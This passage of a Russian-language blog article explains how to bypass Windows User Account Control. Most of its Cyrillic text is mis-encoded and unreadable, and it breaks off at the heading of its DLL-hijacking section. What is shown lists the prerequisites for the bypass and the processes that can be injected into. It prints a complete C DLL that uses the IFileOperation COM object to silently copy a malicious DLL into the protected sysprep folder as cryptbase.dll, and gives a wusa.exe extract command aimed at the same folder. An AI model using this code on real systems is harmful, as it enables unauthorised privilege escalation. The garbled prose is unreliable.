I"”w<h1 class="no_toc" id="–æ–≥–ª–∞–≤–ª–µ–Ω–∏–µ">–û–≥–ª–∞–≤–ª–µ–Ω–∏–µ</h1>

<ul id="markdown-toc">
  <li><a href="#–≤–≤–µ–¥–µ–Ω–∏–µ" id="markdown-toc-–≤–≤–µ–¥–µ–Ω–∏–µ">–í–≤–µ–¥–µ–Ω–∏–µ</a></li>
  <li><a href="#–æ–±—Ö–æ–¥-uac" id="markdown-toc-–æ–±—Ö–æ–¥-uac">–û–±—Ö–æ–¥ UAC</a></li>
  <li><a href="#–∑–∞–ø–∏—Å—å-–≤-–±–µ–∑–æ–ø–∞—Å–Ω–æ–µ-–º–µ—Å—Ç–æ" id="markdown-toc-–∑–∞–ø–∏—Å—å-–≤-–±–µ–∑–æ–ø–∞—Å–Ω–æ–µ-–º–µ—Å—Ç–æ">–ó–∞–ø–∏—Å—å –≤ –±–µ–∑–æ–ø–∞—Å–Ω–æ–µ –º–µ—Å—Ç–æ</a></li>
  <li><a href="#ifileoperation-com-object" id="markdown-toc-ifileoperation-com-object">IFileOperation COM Object</a></li>
  <li><a href="#windows-update-standalone-installer" id="markdown-toc-windows-update-standalone-installer">Windows Update Standalone Installer</a></li>
  <li><a href="#—ç–∫—Å–ø–ª—É–∞—Ç–∞—Ü–∏—è-—É—è–∑–≤–∏–º–æ—Å—Ç–∏-dll-hijacking" id="markdown-toc-—ç–∫—Å–ø–ª—É–∞—Ç–∞—Ü–∏—è-—É—è–∑–≤–∏–º–æ—Å—Ç–∏-dll-hijacking">–≠–∫—Å–ø–ª—É–∞—Ç–∞—Ü–∏—è —É—è–∑–≤–∏–º–æ—Å—Ç–∏ DLL hijacking</a></li>
  <li><a href="#—Å–º—è–≥—á–µ–Ω–∏–µ" id="markdown-toc-—Å–º—è–≥—á–µ–Ω–∏–µ">–°–º—è–≥—á–µ–Ω–∏–µ</a></li>
  <li><a href="#–∫–æ–Ω—Ç—Ä–æ–ª—å-—É—á–µ—Ç–Ω—ã—Ö-–∑–∞–ø–∏—Å–µ–π-–∑–∞–ø—É—Å–∫-–≤—Å–µ—Ö-–∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–≤-–≤-—Ä–µ–∂–∏–º–µ-–æ–¥–æ–±—Ä–µ–Ω–∏—è-–∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–º" id="markdown-toc-–∫–æ–Ω—Ç—Ä–æ–ª—å-—É—á–µ—Ç–Ω—ã—Ö-–∑–∞–ø–∏—Å–µ–π-–∑–∞–ø—É—Å–∫-–≤—Å–µ—Ö-–∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–≤-–≤-—Ä–µ–∂–∏–º–µ-–æ–¥–æ–±—Ä–µ–Ω–∏—è-–∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–º">–ö–æ–Ω—Ç—Ä–æ–ª—å —É—á–µ—Ç–Ω—ã—Ö –∑–∞–ø–∏—Å–µ–π: –∑–∞–ø—É—Å–∫ –≤—Å–µ—Ö –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–≤ –≤ —Ä–µ–∂–∏–º–µ –æ–¥–æ–±—Ä–µ–Ω–∏—è –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–º.</a></li>
  <li><a href="#–∑–∞–∫–ª—é—á–µ–Ω–∏–µ" id="markdown-toc-–∑–∞–∫–ª—é—á–µ–Ω–∏–µ">–ó–∞–∫–ª—é—á–µ–Ω–∏–µ</a></li>
  <li><a href="#—Å—Å—ã–ª–∫–∏" id="markdown-toc-—Å—Å—ã–ª–∫–∏">–°—Å—ã–ª–∫–∏</a></li>
</ul>

<h1 id="–≤–≤–µ–¥–µ–Ω–∏–µ">–í–≤–µ–¥–µ–Ω–∏–µ</h1>

<p>–ó–∞—â–∏—Ç–∞ –∫–æ–º–ø—å—é—Ç–µ—Ä–æ–≤ –æ—Ç –∑–ª–æ—É–ø–æ—Ç—Ä–µ–±–ª–µ–Ω–∏–π –≤ –∫–æ—Ä–ø–æ—Ä–∞—Ç–∏–≤–Ω–æ–π —Å—Ä–µ–¥–µ –≤—Å–µ–≥–¥–∞ –±—ã–ª–∞ –Ω–µ–ø—Ä–µ—Ä—ã–≤–Ω—ã–º –ø—Ä–æ—Ü–µ—Å—Å–æ–º. –ü—Ä–µ–¥–æ—Å—Ç–∞–≤–ª–µ–Ω–∏–µ –ø—Ä–∞–≤ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞ –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª—è–º –≤—Å–µ–≥–¥–∞ –∑–ª–æ—É–ø–æ—Ç—Ä–µ–±–ª—è–ª–æ—Å—å –∏ –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª–∏ —É—Å—Ç–∞–Ω–∞–≤–ª–∏–≤–∞–ª–∏ –Ω–µ—É—Ç–≤–µ—Ä–∂–¥–µ–Ω–Ω–æ–µ –ø—Ä–æ–≥—Ä–∞–º–º–Ω–æ–µ –æ–±–µ—Å–ø–µ—á–µ–Ω–∏–µ, –∏–∑–º–µ–Ω—è–ª–∏ –∫–æ–Ω—Ñ–∏–≥—É—Ä–∞—Ü–∏–∏ –∏ —Ç–¥. –ù–µ –ø—Ä–µ–¥–æ—Å—Ç–∞–≤–ª—è–π –ø—Ä–∞–≤–∞ –ª–æ–∫–∞–ª—å–Ω–æ–≥–æ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞ –∏ –æ–Ω–∏ —É—Ç–≤–µ—Ä–∂–¥–∞—é—Ç, —á—Ç–æ –Ω–µ –º–æ–≥—É—Ç –≤—ã–ø–æ–ª–Ω—è—Ç—å —Å–≤–æ—é —Ä–∞–±–æ—Ç—É. –ï—Å–ª–∏ –º–∞–ª–≤–∞—Ä—å —Å–∫–æ–º–ø—Ä–æ–º–µ—Ç–∏—Ä–æ–≤–∞–ª–∞ –º–∞—à–∏–Ω—É —Å –ø–æ–ª–Ω—ã–º–∏ –ø—Ä–∞–≤–∞–º–∏ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞, —Ç–æ –≤—ã, —Å–∫–æ—Ä–µ–µ –≤—Å–µ–≥–æ, –ø–æ–ø—ã—Ç–∞–µ—Ç–µ—Å—å –ø–µ—Ä–µ–æ–±–æ—Ä—É–¥–æ–≤–∞—Ç—å –µ–µ.</p>

<p>–ö–æ–Ω—Ç—Ä–æ–ª—å —É—á–µ—Ç–Ω—ã—Ö –∑–∞–ø–∏—Å–µ–π (UAC) –¥–∞–µ—Ç –Ω–∞–º –≤–æ–∑–º–æ–∂–Ω–æ—Å—Ç—å —Ä–∞–±–æ—Ç–∞—Ç—å —Å–æ —Å—Ç–∞–Ω–¥–∞—Ä—Ç–Ω—ã–º–∏ –ø—Ä–∞–≤–∞–º–∏ –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª—è –≤–º–µ—Å—Ç–æ –ø–æ–ª–Ω—ã—Ö –ø—Ä–∞–≤ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞. –¢–∞–∫–∏–º –æ–±—Ä–∞–∑–æ–º, –¥–∞–∂–µ –µ—Å–ª–∏ –≤–∞—à–∞ —Å—Ç–∞–Ω–¥–∞—Ä—Ç–Ω–∞—è —É—á–µ—Ç–Ω–∞—è –∑–∞–ø–∏—Å—å –Ω–∞—Ö–æ–¥–∏—Ç—Å—è –≤ –≥—Ä—É–ø–ø–µ –ª–æ–∫–∞–ª—å–Ω—ã—Ö –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–≤, —É—â–µ—Ä–± –æ–≥—Ä–∞–Ω–∏—á–µ–Ω. –¢–æ –µ—Å—Ç—å —É—Å—Ç–∞–Ω–æ–≤–∫–∞ —Å–ª—É–∂–±, –¥—Ä–∞–π–≤–µ—Ä–æ–≤, –∑–∞–ø–∏—Å—å –≤ –±–µ–∑–æ–ø–∞—Å–Ω—ã–µ –º–µ—Å—Ç–∞ –∏ —Ç–¥ –∑–∞–ø—Ä–µ—â–µ–Ω—ã. –î–ª—è –≤—ã–ø–æ–ª–Ω–µ–Ω–∏—è —ç—Ç–∏—Ö –¥–µ–π—Å—Ç–≤–∏–π –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª—è–º –ø–æ—Ç—Ä–µ–±—É–µ—Ç—Å—è –≤–∑–∞–∏–º–æ–¥–µ–π—Å—Ç–≤–æ–≤–∞—Ç—å —Å —Ä–∞–±–æ—á–∏–º —Å—Ç–æ–ª–æ–º, –Ω–∞–ø—Ä–∏–º–µ—Ä, —â–µ–ª–∫–Ω—É–≤ –ø—Ä–∞–≤–æ–π –∫–Ω–æ–ø–∫–æ–π –º—ã—à–∏ –∏ –∑–∞–ø—É—Å—Ç–∏–≤ –∏—Ö —Å –ø—Ä–∞–≤–∞–º–∏ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞, –∏–ª–∏ –ø—Ä–∏–Ω—è—Ç—å –∑–∞–ø—Ä–æ—Å –Ω–∞ –ø–æ–≤—ã—à–µ–Ω–∏–µ –ø—Ä–∞–≤ –æ—Ç UAC. UAC –±—ã–ª –ø—Ä–µ–¥—Å—Ç–∞–≤–ª–µ–Ω –Ω–∞—á–∏–Ω–∞—è —Å Windows Vista –∏ —Å–æ–¥–µ—Ä–∂–∏—Ç —Ä—è–¥ —Ç–µ—Ö–Ω–æ–ª–æ–≥–∏–π –≤–∫–ª—é—á–∞—è –≤–∏—Ä—Ç—É–∞–ª–∏–∑–∞—Ü–∏—é —Ñ–∞–π–ª–æ–≤–æ–π —Å–∏—Å—Ç–µ–º—ã –∏ —Ä–µ–µ—Å—Ç—Ä–∞, —É—á–µ—Ç–Ω—É—é –∑–∞–ø–∏—Å—å –∑–∞—â–∏—â–µ–Ω–Ω–æ–≥–æ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞ (PA –∏–ª–∏ Protected Administrator), –∑–∞–ø—Ä–æ—Å—ã –Ω–∞ –ø–æ–≤—ã—à–µ–Ω–∏–µ –ø—Ä–∞–≤ UAC –∏ —É—Ä–æ–≤–Ω–∏ —Ü–µ–ª–æ—Å—Ç–Ω–æ—Å—Ç–∏ Windows.</p>

<p>UAC —Ä–∞–±–æ—Ç–∞–µ—Ç —Ä–µ–≥—É–ª–∏—Ä—É—è —É—Ä–æ–≤–µ–Ω—å —Ä–∞–∑—Ä–µ—à–µ–Ω–∏–π –Ω–∞—à–µ–π —É—á–µ—Ç–Ω–æ–π –∑–∞–ø–∏—Å–∏, –ø–æ—ç—Ç–æ–º—É –¥–µ–π—Å—Ç–≤–∏—è –ø—Ä–æ–≥—Ä–∞–º–º –≤—ã–ø–æ–ª–Ω—è—é—Ç—Å—è –∏–∑ –ø–æ–¥ –æ–±—ã—á–Ω–æ–≥–æ –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª—è, –¥–∞–∂–µ –µ—Å–ª–∏ —É –Ω–∞—Å –µ—Å—Ç—å –ø—Ä–∞–≤–∞ –ª–æ–∫–∞–ª—å–Ω–æ–≥–æ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞ –Ω–∞ –∫–æ–º–ø—å—é—Ç–µ—Ä–µ. –ö–æ–≥–¥–∞ –±—É–¥—É—Ç –≤–Ω–µ—Å–µ–Ω—ã –∏–∑–º–µ–Ω–µ–Ω–∏—è —Ç—Ä–µ–±—É—é—â–∏–µ —Ä–∞–∑—Ä–µ—à–µ–Ω–∏—è –Ω–∞ —É—Ä–æ–≤–Ω–µ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞, UAC —É–≤–µ–¥–æ–º–∏—Ç –Ω–∞—Å. –ï—Å–ª–∏ —É –Ω–∞—Å –µ—Å—Ç—å –ø—Ä–∞–≤–∞ –ª–æ–∫–∞–ª—å–Ω–æ–≥–æ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞, –º—ã –º–æ–∂–µ–º –Ω–∞–∂–∞—Ç—å ¬´–î–∞¬ª, —á—Ç–æ–±—ã –ø—Ä–æ–¥–æ–ª–∂–∏—Ç—å, –≤ –ø—Ä–æ—Ç–∏–≤–Ω–æ–º —Å–ª—É—á–∞–µ –Ω–∞–º –±—É–¥–µ—Ç –ø—Ä–µ–¥–ª–æ–∂–µ–Ω–æ –≤–≤–µ—Å—Ç–∏ –ø–∞—Ä–æ–ª—å –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞. –û–¥–Ω–∞–∫–æ —ç—Ç–æ –±—É–¥–µ—Ç –∑–∞–≤–∏—Å–µ—Ç—å –æ—Ç —Ç–æ–≥–æ, –∫–∞–∫–∏–µ –ø–æ–ª–∏—Ç–∏–∫–∏ –±—ã–ª–∏ –æ–ø—Ä–µ–¥–µ–ª–µ–Ω—ã –≤ –≤–∞—à–µ–π —Å—Ä–µ–¥–µ.</p>

<p>–í —ç—Ç–æ–π —Å—Ç–∞—Ç—å–µ –ø–æ–∫–∞–∑–∞–Ω–æ, –∫–∞–∫ –ª–µ–≥–∫–æ –º–æ–∂–Ω–æ –æ–±–æ–π—Ç–∏ –∑–∞–ø—Ä–æ—Å—ã –Ω–∞ –ø–æ–≤—ã—à–µ–Ω–∏–µ –ø—Ä–∞–≤ UAC –∏ –∫–∞–∫–∏–µ –¥–µ–π—Å—Ç–≤–∏—è –º–æ–∂–Ω–æ –ø—Ä–µ–¥–ø—Ä–∏–Ω—è—Ç—å –¥–ª—è —É–º–µ–Ω—å—à–µ–Ω–∏—è —ç—Ç–æ–π —É–≥—Ä–æ–∑—ã.</p>

<p><img src="/assets/img/posts/bypass uac/regedituac.png" alt="1" class="imghalf" /></p>

<h1 id="–æ–±—Ö–æ–¥-uac">–û–±—Ö–æ–¥ UAC</h1>

<p>–≠–∫—Å–ø–ª—É–∞—Ç–∞—Ü–∏—è UAC —è–≤–ª—è–µ—Ç—Å—è —Ç—Ä–∏–≤–∏–∞–ª—å–Ω—ã–º –ø—Ä–æ—Ü–µ—Å—Å–æ–º. –ï—Å—Ç—å –¥–≤–∞ —ç—Ç–∞–ø–∞ –∫–æ—Ç–æ—Ä—ã–µ –Ω–µ–æ–±—Ö–æ–¥–∏–º–æ –ø—Ä–æ–π—Ç–∏ –¥–ª—è –¥–æ—Å—Ç–∏–∂–µ–Ω–∏—è –æ–±—Ö–æ–¥–∞, —á—Ç–æ–±—ã –ø–æ–¥–Ω—è—Ç—å—Å—è –æ—Ç —Å—Ç–∞–Ω–¥–∞—Ä—Ç–Ω—ã—Ö –ø—Ä–∞–≤ –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª—è –¥–æ –ø—Ä–∞–≤ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞. –≠—Ç–∏ —à–∞–≥–∏ —à–∏—Ä–æ–∫–æ –æ–ø—É–±–ª–∏–∫–æ–≤–∞–Ω—ã, —Ç–∞–∫ —á—Ç–æ –≤ —ç—Ç–æ–º –Ω–µ—Ç –Ω–∏—á–µ–≥–æ –Ω–æ–≤–æ–≥–æ, —Ö–æ—Ç—è –Ω–∞ —ç—Ç–∞–ø–µ 2 –¥–æ–∫—É–º–µ–Ω—Ç–∏—Ä–æ–≤–∞–Ω—ã –µ—â–µ –Ω–µ–∫–æ—Ç–æ—Ä—ã–µ —É—è–∑–≤–∏–º–æ—Å—Ç–∏ —Å–≤—è–∑–∞–Ω–Ω—ã–µ —Å –∑–∞—Ö–≤–∞—Ç–æ–º (hijacking) DLL.</p>

<blockquote>
  <p>–ó–∞–ø–∏c—å –≤ –±–µ–∑–æ–ø–∞—Å–Ω–æ–µ –º–µ—Å—Ç–æ
–≠–∫—Å–ø–ª—É–∞—Ç–∞—Ü–∏—è DLL hijacking —É—è–∑–≤–∏–º–æ—Å—Ç–∏</p>
</blockquote>

<p>–î–ª—è —Ç–æ–≥–æ —á—Ç–æ–±—ã –Ω–∞—à –æ–±—Ö–æ–¥ –±—ã–ª —É—Å–ø–µ—à–Ω—ã–º, –º—ã –¥–æ–ª–∂–Ω—ã –Ω–∞—á–∞—Ç—å —Å:</p>

<blockquote>
  <p>–°—Ç–∞–Ω–¥–∞—Ä—Ç–Ω—ã–π –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª—å –≤ –≥—Ä—É–ø–ø–µ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–≤
–ò—Å–ø–æ–ª–Ω—è–µ–º—ã–π —Ñ–∞–π–ª Windows –∫–æ—Ç–æ—Ä—ã–π –¥–æ–ª–∂–µ–Ω –±—ã—Ç—å –ø–æ–¥–ø–∏—Å–∞–Ω —Å–µ—Ä—Ç–∏—Ñ–∏–∫–∞—Ç–æ–º –ø–æ–¥–ø–∏—Å–∏ –∫–æ–¥–∞ Microsoft
–ò—Å–ø–æ–ª–Ω—è–µ–º—ã–π —Ñ–∞–π–ª Windows –¥–æ–ª–∂–µ–Ω –Ω–∞—Ö–æ–¥–∏—Ç—å—Å—è –≤ –±–µ–∑–æ–ø–∞—Å–Ω–æ–º –∫–∞—Ç–∞–ª–æ–≥–µ
–ò—Å–ø–æ–ª–Ω—è–µ–º—ã–π —Ñ–∞–π–ª Windows —Ç–∞–∫–∂–µ –¥–æ–ª–∂–µ–Ω —É–∫–∞–∑—ã–≤–∞—Ç—å —Å–≤–æ–π—Å—Ç–≤–æ –∞–≤—Ç–æ–º–∞—Ç–∏—á–µ—Å–∫–æ–≥–æ –ø–æ–¥–Ω—è—Ç–∏—è –ø—Ä–∞–≤ (Elevate) –≤ —Å–≤–æ–µ–º –º–∞–Ω–∏—Ñ–µ—Å—Ç–µ.</p>
</blockquote>

<h1 id="–∑–∞–ø–∏—Å—å-–≤-–±–µ–∑–æ–ø–∞—Å–Ω–æ–µ-–º–µ—Å—Ç–æ">–ó–∞–ø–∏—Å—å –≤ –±–µ–∑–æ–ø–∞—Å–Ω–æ–µ –º–µ—Å—Ç–æ</h1>
<p>–ï—Å—Ç—å –Ω–µ—Å–∫–æ–ª—å–∫–æ —Å–ø–æ—Å–æ–±–æ–≤, –∫–æ—Ç–æ—Ä—ã–º–∏ –º—ã –º–æ–∂–µ–º –∑–∞–ø–∏—Å–∞—Ç—å —Ñ–∞–π–ª –≤ –±–µ–∑–æ–ø–∞—Å–Ω–æ–µ –º–µ—Å—Ç–æ.</p>

<blockquote>
  <p>–ò—Å–ø–æ–ª—å–∑–æ–≤–∞—Ç—å IFileOperation COM Object
–ò—Å–ø–æ–ª—å–∑–æ–≤–∞–Ω–∏–µ –∞–≤—Ç–æ–Ω–æ–º–Ω–æ–≥–æ —É—Å—Ç–∞–Ω–æ–≤—â–∏–∫–∞ –¶–µ–Ω—Ç—Ä–∞ –æ–±–Ω–æ–≤–ª–µ–Ω–∏—è Windows (Windows Update Standalone Installer/wusa.exe)</p>
</blockquote>

<h1 id="ifileoperation-com-object">IFileOperation COM Object</h1>

<p>COM Object –≤ IFileOperation –∏–º–µ–µ—Ç –º–µ—Ç–æ–¥, –∫–æ—Ç–æ—Ä—ã–π –º—ã –º–æ–∂–µ–º –∏—Å–ø–æ–ª—å–∑–æ–≤–∞—Ç—å –¥–ª—è –∫–æ–ø–∏—Ä–æ–≤–∞–Ω–∏—è —Ñ–∞–π–ª–æ–≤ –≤ –Ω–∞—à–µ –±–µ–∑–æ–ø–∞—Å–Ω–æ–µ –º–µ—Å—Ç–æ, —Ç–∞–∫ –∫–∞–∫ –æ–ø–µ—Ä–∞—Ü–∏—è –∞–≤—Ç–æ–º–∞—Ç–∏—á–µ—Å–∫–∏ –ø–æ–¥–Ω–∏–º–µ—Ç—Å—è –≤ –ø—Ä–∞–≤–∞—Ö –∏ —Å–º–æ–∂–µ—Ç —Å–¥–µ–ª–∞—Ç—å –∫–æ–ø–∏—é –ø—Ä–∏–≤–∏–ª–µ–≥–∏–π. –î–ª—è –∏—Å–ø–æ–ª—å–∑–æ–≤–∞–Ω–∏—è –º—ã –º–æ–∂–µ–º –≤–Ω–µ–¥—Ä–∏—Ç—å –Ω–∞—à—É –≤—Ä–µ–¥–æ–Ω–æ—Å–Ω—É—é DLL –≤ –ø—Ä–æ—Ü–µ—Å—Å —Å—Ä–µ–¥–Ω–µ–π —Ü–µ–ª–æ—Å—Ç–Ω–æ—Å—Ç–∏ –¥–ª—è –≤—ã–ø–æ–ª–Ω–µ–Ω–∏—è –æ–ø–µ—Ä–∞—Ü–∏–∏. –ü–æ—Å–∫–æ–ª—å–∫—É –¥–ª—è COM-–æ–±—ä–µ–∫—Ç–∞ —É—Å—Ç–∞–Ω–æ–≤–ª–µ–Ω–æ –∞–≤—Ç–æ–º–∞—Ç–∏—á–µ—Å–∫–æ–µ –ø–æ–≤—ã—à–µ–Ω–∏–µ —É—Ä–æ–≤–Ω—è, –≤–Ω–µ–¥—Ä–µ–Ω–Ω—ã–π –ø—Ä–æ—Ü–µ—Å—Å –Ω–µ –Ω—É–∂–Ω–æ –æ—Ç–º–µ—á–∞—Ç—å –¥–ª—è –∞–≤—Ç–æ–º–∞—Ç–∏—á–µ—Å–∫–æ–≥–æ –ø–æ–≤—ã—à–µ–Ω–∏—è –≤ —Å–≤–æ–µ–º –º–∞–Ω–∏—Ñ–µ—Å—Ç–µ.</p>

<p>–í Windows 7 –≤–Ω–µ–¥—Ä–µ–Ω—ã –ø—Ä–æ—Ü–µ—Å—Å—ã –∫–æ—Ç–æ—Ä—ã–µ –º–æ–≥—É—Ç –±—ã—Ç—å —É—Å–ø–µ—à–Ω–æ —Å–∫–æ–ø–∏—Ä–æ–≤–∞–Ω—ã, —ç—Ç–æ:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Windows\explorer.exe
C:\Windows\System32\wuauclt.exe
C:\Windows\System32\taskhost.exe
</code></pre></div></div>

<p>–í–æ –≤—Ä–µ–º—è —Ç–µ—Å—Ç–æ–≤ taskhost.exe —Å—Ä–∞–±–∞—Ç—ã–≤–∞–µ—Ç —Ç–æ–ª—å–∫–æ –æ–¥–∏–Ω —Ä–∞–∑ –ø–æ—Å–ª–µ –∑–∞–≥—Ä—É–∑–∫–∏, –∏ wuauclt.exe –Ω–µ –≤—Å–µ–≥–¥–∞ —Ä–∞–±–æ—Ç–∞–µ—Ç, —á—Ç–æ –æ—Å—Ç–∞–≤–ª—è–µ—Ç —Ç–æ–ª—å–∫–æ explorer.exe –Ω–∞–¥–µ–∂–Ω—ã–º –ø—Ä–æ—Ü–µ—Å—Å–æ–º.</p>

<p>On Windows 8 –≤–Ω–µ–¥—Ä–µ–Ω—ã –ø—Ä–æ—Ü–µ—Å—Å—ã –∫–æ—Ç–æ—Ä—ã–µ —É—Å–ø–µ—à–Ω–æ —Å–∫–æ–ø–∏—Ä–æ–≤–∞–Ω—ã, —ç—Ç–æ:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Windows\explorer.exe
C:\Windows\System32\wuauclt.exe
C:\Windows\System32\RuntimeBroker.exe
</code></pre></div></div>

<p>–ò —Å–Ω–æ–≤–∞ —Ç–æ–ª—å–∫–æ explorer.exe –Ω–∞–¥–µ–∂–Ω—ã–π –ø—Ä–æ—Ü–µ—Å—Å, –∏ –µ–¥–∏–Ω—Å—Ç–≤–µ–Ω–Ω—ã–π –∫–æ—Ç–æ—Ä—ã–π —Ä–∞–±–æ—Ç–∞–ª –≤ Windows 8.1</p>

<p>–û—Å–Ω–æ–≤–Ω–∞—è —á–∞—Å—Ç—å –∫–æ–¥–∞ –Ω–∏–∂–µ –≤–∑—è—Ç–∞ –∏–∑ MSDN —Å –Ω–µ–∫–æ—Ç–æ—Ä—ã–º–∏ –Ω–µ–∑–Ω–∞—á–∏—Ç–µ–ª—å–Ω—ã–º–∏ –∏–∑–º–µ–Ω–µ–Ω–∏—è–º–∏. –ò—Å–ø–æ–ª—å–∑—É–µ–º—ã–µ –∑–Ω–∞—á–µ–Ω–∏—è SetOperationFlags –±—ã–ª–∏ –≤–∑—è—Ç—ã –∏–∑ –æ–ø—É–±–ª–∏–∫–æ–≤–∞–Ω–Ω–æ–≥–æ –∫–æ–¥–∞ –æ–±—Ö–æ–¥–∞ UAC <a href="https://download.pureftpd.org/pub/misc/UAC.cpp">–∑–¥–µ—Å—å</a>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
#include &lt;Shobjidl.h&gt;
#include &lt;Windows.h&gt;

#pragma comment(lib, "Ole32.lib")
#pragma comment(lib, "shell32.lib")

int WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
FileOperation  *pfo;
IShellItem      *psiFrom = NULL;
IShellItem      *psiTo = NULL;
LPCWSTR pszSrcItem = L"calc.dll";
LPCWSTR pszNewName = L"cryptbase.dll";
LPCWSTR pszDest    = L"C:\\windows\\System32\\sysprep";

HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
if (SUCCEEDED(hr))
{
 hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&amp;pfo));
 if (SUCCEEDED(hr))
 {
 hr = pfo-&gt;SetOperationFlags( FOF_NOCONFIRMATION |
 FOF_SILENT |
 FOFX_SHOWELEVATIONPROMPT |
 FOFX_NOCOPYHOOKS |
 FOFX_REQUIREELEVATION |
 FOF_NOERRORUI );
 if (SUCCEEDED(hr))
 {
 hr = SHCreateItemFromParsingName(pszSrcItem, NULL, IID_PPV_ARGS(&amp;psiFrom));
 if (SUCCEEDED(hr))
 {
 if (NULL != pszDest)
 {
 hr = SHCreateItemFromParsingName(pszDest, NULL, IID_PPV_ARGS(&amp;psiTo));
 }
 if (SUCCEEDED(hr))
 {
 hr = pfo-&gt;CopyItem(psiFrom, psiTo, pszNewName, NULL);
 if (NULL != psiTo)
 {
 psiTo-&gt;Release();
 }
 }
 psiFrom-&gt;Release();
 }
 if (SUCCEEDED(hr))
 {
 hr = pfo-&gt;PerformOperations();
 }
 }
 pfo-&gt;Release();
 }
 CoUninitialize();
 }
 return 0;
}
</code></pre></div></div>

<h1 id="windows-update-standalone-installer">Windows Update Standalone Installer</h1>
<p>–î—Ä—É–≥–æ–π —Å–ø–æ—Å–æ–± –∫–æ–ø–∏—Ä–æ–≤–∞–Ω–∏—è –≤ –Ω–∞—à–µ –±–µ–∑–æ–ø–∞—Å–Ω–æ–µ –º–µ—Å—Ç–æ, —ç—Ç–æ –∏—Å–ø–æ–ª—å–∑–æ–≤–∞—Ç—å Windows Update Standalone Installer (wusa.exe). Wusa.exe –∑–∞–ø—É—Å–∫–∞–µ—Ç—Å—è –∫–∞–∫ –ø—Ä–æ—Ü–µ—Å—Å –≤—ã—Å–æ–∫–æ–π —Ü–µ–ª–æ—Å—Ç–Ω–æ—Å—Ç–∏ —Ç–∫. –Ω–∞—Å—Ç—Ä–æ–µ–Ω –Ω–∞ –∞–≤—Ç–æ-–ø–æ–¥—ä—ë–º –ø—Ä–∞–≤ –≤ —Å–≤–æ–µ–º –º–∞–Ω–∏—Ñ–µ—Å—Ç–µ. –î–ª—è –∞–≤—Ç–æ–º–∞—Ç–∏—á–µ—Å–∫–æ–≥–æ –ø–æ–≤—ã—à–µ–Ω–∏—è –ø—Ä–∞–≤, –∏—Å–ø–æ–ª–Ω—è–µ–º—ã–π Windows —Ñ–∞–π–ª –¥–æ–ª–∂–µ–Ω –±—ã—Ç—å –ø–æ–¥–ø–∏—Å–∞–Ω, –Ω–∞—Ö–æ–¥–∏—Ç—å—Å—è –≤ –±–µ–∑–æ–ø–∞—Å–Ω–æ–º –∫–∞—Ç–∞–ª–æ–≥–µ, —Ç–∞–∫–æ–º –∫–∞–∫ C:\Windows\System32, –∏ –¥–æ–ª–∂–µ–Ω –±—ã—Ç—å —Å –ø—Ä–∞–≤–∏–ª—å–Ω–æ –ø—Ä–æ–ø–∏—Å–∞–Ω–Ω—ã–º —Å–≤–æ–π—Å—Ç–≤–æ–º autoElevate –≤ —Å–≤–æ–µ–º –º–∞–Ω–∏—Ñ–µ—Å—Ç–µ.</p>

<p><img src="/assets/img/posts/bypass uac/wusaautoelevate.png" alt="1" class="imghalf" /></p>

<p>–ú—ã –∏—Å–ø–æ–ª—å–∑—É–µ–º wusa.exe –¥–ª—è —Ä–∞—Å–ø–∞–∫–æ–≤–∫–∏ CAB —Ñ–∞–π–ª (cabinet archive file –∏–ª–∏ —Ñ–∞–π–ª –∫–∞–±–∏–Ω–µ—Ç–Ω–æ–≥–æ –∞—Ä—Ö–∏–≤–∞) –≤ –Ω–∞—à–µ –±–µ–∑–æ–ø–∞—Å–Ω–æ–µ –º–µ—Å—Ç–æ</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wusa c:\users\user1\desktop\poc.tmp /extract:c:\windows\system32\sysprep
</code></pre></div></div>

<h1 id="—ç–∫—Å–ø–ª—É–∞—Ç–∞—Ü–∏—è-—É—è–∑–≤–∏–º–æ—Å—Ç–∏-dll-hijacking">–≠–∫—Å–ø–ª—É–∞—Ç–∞—Ü–∏—è —É—è–∑–≤–∏–º–æ—Å—Ç–∏ DLL hijacking</h1>
